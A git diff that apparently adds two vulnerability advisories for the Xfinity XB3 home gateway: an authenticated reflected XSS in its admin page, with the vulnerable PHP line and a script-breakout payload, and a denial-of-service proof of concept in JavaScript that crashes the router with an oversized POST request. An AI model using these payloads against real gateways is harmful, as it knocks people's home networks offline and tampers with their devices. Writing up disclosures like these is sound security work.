diff --git a/xfinity/xb3-authenticated-reflected-xss/README.md b/xfinity/xb3-authenticated-reflected-xss/README.md
new file mode 100644
index 0000000..1e38280
--- /dev/null
+++ b/xfinity/xb3-authenticated-reflected-xss/README.md
@@ -0,0 +1,17 @@
+# Xfinity Gateway XB3 - Authenticated Reflected XSS
+The administrative interface of Xfinity Gateway model XB3 (and possibly others) will execute arbitrary JavaScript if sent a specially crafted POST request by an a logged in administrator.
+
+## Details
+The `/wizard_step2.php` page takes a POST parameter `userPassword` and unsafely echoes it to JavaScript on the page:
+
+    var newPassword = '<?php if("admin" == $_SESSION["loginuser"]) echo $_POST["userPassword"]; ?>';
+
+Arbitrary JavaScript can be executed if the following payload is sent in the `userPassword` POST parameter:
+
+    ';}alert(1);function foo() {var foo = '
+
+## Mitigating Factors
+Users can be logged into the XB3 gateway by any website if the device is using default credentials. However, the POST request exploiting this vulnerability requires a valid CSRF protection token, so this vulnerability is not exploitable by malicious websites without an accompanying CSRF protection token leak.
+
+## Impact
+5.3 - Medium (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:H/A:L)
diff --git a/xfinity/xb3-dos-via-large-post-request/README.md b/xfinity/xb3-dos-via-large-post-request/README.md
new file mode 100644
index 0000000..74c1b42
--- /dev/null
+++ b/xfinity/xb3-dos-via-large-post-request/README.md
@@ -0,0 +1,17 @@
+# Xfinity Gateway XB3 - DoS Via Large POST Request
+The administrative interface of Xfinity Gateway model XB3 (and possibly others) does not enforce a max POST request size. Any website is able to send a large POST request to the gateway at `10.0.0.1`. If the request size is large enough, the device will stop responding and reboot, leading to a Denial of Service condition due to memory exhaustion.
+
+## Proof of Concept
+The following JavaScript will crash an XB3 gateway if a website visitor stays on the page long enough:
+
+    (() => {
+      const xhr = new XMLHttpRequest();
+      xhr.open('POST', 'http://10.0.0.1');
+      xhr.send('A'.repeat(99999999));
+    })();
+
+## Mitigating Factors
+During testing it took an average of 80 seconds to post enough data to cause this crash, so a website exploiting this bug would need to convince the user to wait around long enough to finish posting the payload.
+
+## Impact
+6.5 - Medium (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)